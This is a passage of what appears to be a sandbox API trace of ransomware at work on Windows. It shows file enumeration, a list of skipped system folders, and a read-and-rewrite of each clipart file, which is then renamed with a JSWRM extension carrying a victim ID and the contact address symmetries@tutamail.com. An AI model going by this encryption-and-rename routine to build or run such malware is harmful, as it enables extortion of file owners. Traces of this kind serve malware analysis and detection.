lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0084.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0084.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0084.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0084.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0084.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0084.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0084.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0084.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0084.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0084.092] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152594.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152594.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152594.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152594.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0084.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0084.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0084.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0084.092] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9261f7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe9261f7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe9261f7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2628, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152600.WMF", cAlternateFileName="")) returned 1 [0084.093] lstrcmpiW (lpString1="J0152600.WMF", lpString2=".") returned 1 [0084.093] lstrcmpiW (lpString1="J0152600.WMF", lpString2="..") returned 1 [0084.093] lstrcmpiW (lpString1="J0152600.WMF", lpString2="...") returned 1 [0084.093] lstrcmpiW (lpString1="J0152600.WMF", lpString2="windows") returned -1 [0084.093] lstrcmpiW (lpString1="J0152600.WMF", lpString2="recovery") returned -1 [0084.093] lstrcmpiW (lpString1="J0152600.WMF", lpString2="perflogs") returned -1 [0084.093] lstrcmpiW (lpString1="J0152600.WMF", lpString2="documents and settings") returned 1 [0084.093] lstrcmpiW (lpString1="J0152600.WMF", lpString2="$RECYCLE.BIN") returned 1 [0084.093] lstrcmpiW (lpString1="J0152600.WMF", lpString2="system volume information") returned -1 [0084.093] lstrcmpiW (lpString1="J0152600.WMF", lpString2="msocache") returned -1 [0084.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0084.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152600.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152600.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152600.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0084.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0084.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152600.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152600.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152600.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0084.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0084.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0084.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0084.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0084.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152600.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152600.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0084.094] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9768) returned 1 [0084.094] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2620) returned 0x24d210 [0084.094] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2620, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2620, lpOverlapped=0x0) returned 1 [0084.126] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.126] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2620, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2620, lpOverlapped=0x0) returned 1 [0084.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0084.127] CloseHandle (hObject=0x314) returned 1 [0084.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0084.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0084.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0084.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0084.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0084.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0084.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0084.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0084.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0084.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0084.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0084.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0084.127] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152600.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152600.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152600.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152600.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0084.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0084.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0084.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0084.128] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9261f7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe9261f7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe94c4b9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1884, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152602.WMF", cAlternateFileName="")) returned 1 [0084.128] lstrcmpiW (lpString1="J0152602.WMF", lpString2=".") returned 1 [0084.128] lstrcmpiW (lpString1="J0152602.WMF", lpString2="..") returned 1 [0084.128] lstrcmpiW (lpString1="J0152602.WMF", lpString2="...") returned 1 [0084.128] lstrcmpiW (lpString1="J0152602.WMF", lpString2="windows") returned -1 [0084.128] lstrcmpiW (lpString1="J0152602.WMF", lpString2="recovery") returned -1 [0084.128] lstrcmpiW (lpString1="J0152602.WMF", lpString2="perflogs") returned -1 [0084.128] lstrcmpiW (lpString1="J0152602.WMF", lpString2="documents and settings") returned 1 [0084.128] lstrcmpiW (lpString1="J0152602.WMF", lpString2="$RECYCLE.BIN") returned 1 [0084.128] lstrcmpiW (lpString1="J0152602.WMF", lpString2="system volume information") returned -1 [0084.128] lstrcmpiW (lpString1="J0152602.WMF", lpString2="msocache") returned -1 [0084.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0084.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152602.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152602.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152602.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0084.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0084.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152602.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152602.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152602.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0084.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0084.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0084.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0084.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0084.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152602.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152602.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0084.135] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6276) returned 1 [0084.135] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1880) returned 0x205850 [0084.135] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1880, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1880, lpOverlapped=0x0) returned 1 [0084.158] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.159] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1880, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1880, lpOverlapped=0x0) returned 1 [0084.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0084.159] CloseHandle (hObject=0x314) returned 1 [0084.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0084.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0084.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0084.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0084.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0084.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0084.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0084.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0084.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0084.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0084.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0084.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0084.159] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152602.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152602.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152602.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152602.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0084.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0084.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0084.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0084.160] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9261f7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe9261f7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe9261f7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x40f8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152606.WMF", cAlternateFileName="")) returned 1 [0084.160] lstrcmpiW (lpString1="J0152606.WMF", lpString2=".") returned 1 [0084.160] lstrcmpiW (lpString1="J0152606.WMF", lpString2="..") returned 1 [0084.160] lstrcmpiW (lpString1="J0152606.WMF", lpString2="...") returned 1 [0084.160] lstrcmpiW (lpString1="J0152606.WMF", lpString2="windows") returned -1 [0084.160] lstrcmpiW (lpString1="J0152606.WMF", lpString2="recovery") returned -1 [0084.160] lstrcmpiW (lpString1="J0152606.WMF", lpString2="perflogs") returned -1 [0084.160] lstrcmpiW (lpString1="J0152606.WMF", lpString2="documents and settings") returned 1 [0084.160] lstrcmpiW (lpString1="J0152606.WMF", lpString2="$RECYCLE.BIN") returned 1 [0084.160] lstrcmpiW (lpString1="J0152606.WMF", lpString2="system volume information") returned -1 [0084.160] lstrcmpiW (lpString1="J0152606.WMF", lpString2="msocache") returned -1 [0084.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0084.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152606.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152606.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152606.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0084.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0084.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152606.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152606.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152606.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0084.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0084.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0084.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0084.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0084.161] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152606.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152606.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0084.162] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16632) returned 1 [0084.162] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40f0) returned 0x24d210 [0084.162] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x40f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x40f0, lpOverlapped=0x0) returned 1 [0084.167] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.167] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x40f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x40f0, lpOverlapped=0x0) returned 1 [0084.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0084.167] CloseHandle (hObject=0x314) returned 1 [0084.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0084.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0084.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0084.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0084.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0084.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0084.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0084.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0084.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0084.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0084.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0084.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0084.168] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152606.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152606.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152606.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152606.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0084.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0084.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0084.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0084.168] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: 